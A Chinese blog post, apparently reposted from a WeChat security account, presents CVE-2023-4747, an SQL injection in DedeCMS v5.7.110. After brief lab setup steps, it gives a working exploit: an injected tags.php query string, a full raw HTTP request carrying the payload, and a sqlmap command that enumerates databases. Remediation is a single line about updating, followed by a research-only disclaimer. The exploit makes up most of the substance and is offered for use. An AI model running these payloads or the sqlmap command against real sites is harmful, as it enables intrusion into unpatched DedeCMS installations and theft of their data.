CVE-2023-4747漏洞（附EXP）

admin

138876
文章

114
评论

2023年9月7日17:29:20评论323 views字数 1387阅读4分37秒阅读模式

CVE-2023-4747漏洞（附EXP）

0x01 前言

DEDECMS 是一种可以综合管理网站上各种栏目的通用工具，DedeCMS 是目前国内最强大、最稳定的中小型门户网站建设解决方案之一，基于 PHP + MySQL 的技术开发，全部源码开放。在最新版本中存在SQL注入漏洞。

CVE-2023-4747漏洞（附EXP）

0x02 影响平台

DedeCMS v5.7.110

0x03 环境搭建

官网地址：https://www.dedecms.com/源码信息：https://github.com/dedecms/DedeCMS

下载源码，利用phpstudy搭建，将此目录作为网站根目录

CVE-2023-4747漏洞（附EXP）

访问install/index.php默认安装即可：

http://127.0.0.1/install/index.php

CVE-2023-4747漏洞（附EXP）

傻瓜式操作~

CVE-2023-4747漏洞（附EXP）

0x04 漏洞复现

环境搭建成功页面是这个酱紫

CVE-2023-4747漏洞（附EXP）

EXP：

/tags.php?QUERY_STRING=/alias/NDT'

CVE-2023-4747漏洞（附EXP）

GET /tags.php?QUERY_STRING=/alias/NDT%27+and+1=1# HTTP/1.1Host: 192.168.0.126Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=lkhe6hs7rr5ap9tbn6vng68784Connection: close

CVE-2023-4747漏洞（附EXP）

sqlmap一把梭：

python2 sqlmap.py -u "http://192.168.0.126/tags.php?QUERY_STRING=/alias/*" --dbs --batch

CVE-2023-4747漏洞（附EXP）

0x05 修复方案

建议及时更新至最新版本

CVE-2023-4747漏洞（附EXP） 往期回顾

1111

关注我

获得更多精彩
觉得内容不错，就点下“赞”和“在看”
如侵权请私聊公众号删文

原文始发于微信公众号（EchoSec）：CVE-2023-4747漏洞（附EXP）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2023-4747漏洞（附EXP）

对抗性机器学习-攻击和缓解的分类和术语（三）

记一次带学员渗透母校

Nosql注入学习记录

SQL注入漏洞实战

基于K8s日志审计实现攻击行为检测

Dr4g0n b4ll_1

XSS目前Web中的另类利用场景和绕Waf的Payload分享|挖洞技巧

文件上传黑名单限制的绕过总结

metasploit（1）生成远控木马

Ghost

发表评论

在线咨询

微信